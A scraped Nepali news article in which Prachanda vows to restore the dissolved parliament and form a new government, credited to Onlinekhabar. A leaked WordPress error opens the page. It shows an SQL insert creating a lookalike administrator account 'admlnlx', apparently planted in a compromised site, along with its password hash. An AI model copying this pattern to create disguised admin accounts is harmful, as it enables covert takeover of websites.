WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRbJjmj5Tz8eK0oRoP2/sav/IHTbon1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 23:19:55', '', 'admlnlx', 'admlnlx')
काठमाडौं । नेपाल कम्युनिस्ट पार्टी (नेकपा) का अध्यक्ष पुष्पकमल दाहाल प्रचण्डले संसद पुनर्स्थापित गरेर नयाँ सरकार बनाउने बताएका छन् । बुधबार प्रचण्ड- माधव समूहका सांसदहरुको बैठकमा उनले संसद विघटन अवैधानिक भएकाले पुनर्स्थापित गरेर नयाँ सरकार बनाउने बताए ।
‘संसद पुनर्स्थापित गरेर नयाँ सरकार बनाउने हाम्रो प्रतिवद्धता छ ।…अरु संसदीय दलका नेताहरूसँग पनि छलफल गरेर नयाँ परिस्थिति निर्माणमा हामी छौं’ उनले भने ।
प्रचण्डले ७० प्रतिशतको उपस्थितिमा केन्द्रीय समिति बैठक बसेपछि आफूहरु नै वैधानिक र ठूलो दल भएको बताए । ‘संसदीय दलमा पनि ११५ अहिले नै सहभागी हुनुहुन्छ र अरु केही सांसदहरुले हस्ताक्षर गर्ने वचन दिनुभएको छ त्यसकारण संसदीय दलमा पनि हामी नै वैधानिक छौँ’ उनले भने, ‘सबैभन्दा ठूलो दल यसले पनि पुष्टि गर्छ ।’
संसद विघटन असंवैधानिक र अलोकतान्त्रिक भन्दै उनले संविधानसभाबाट प्रधानमन्त्रीले संसद विघटन गर्न नसक्ने भनेर लेखेको स्मरण गरे । ‘यसको पछाडि ठूलै षड्यन्त्र छ, देशी विदेशी शक्तिको चलखेल खुल्दै जाला, अहिले विश्वले नेपालको यो घटनालाई चासोका साथ पनि हेरिरहेका छन्’ प्रचण्डले भने ।
साभार: अनलाइनखबर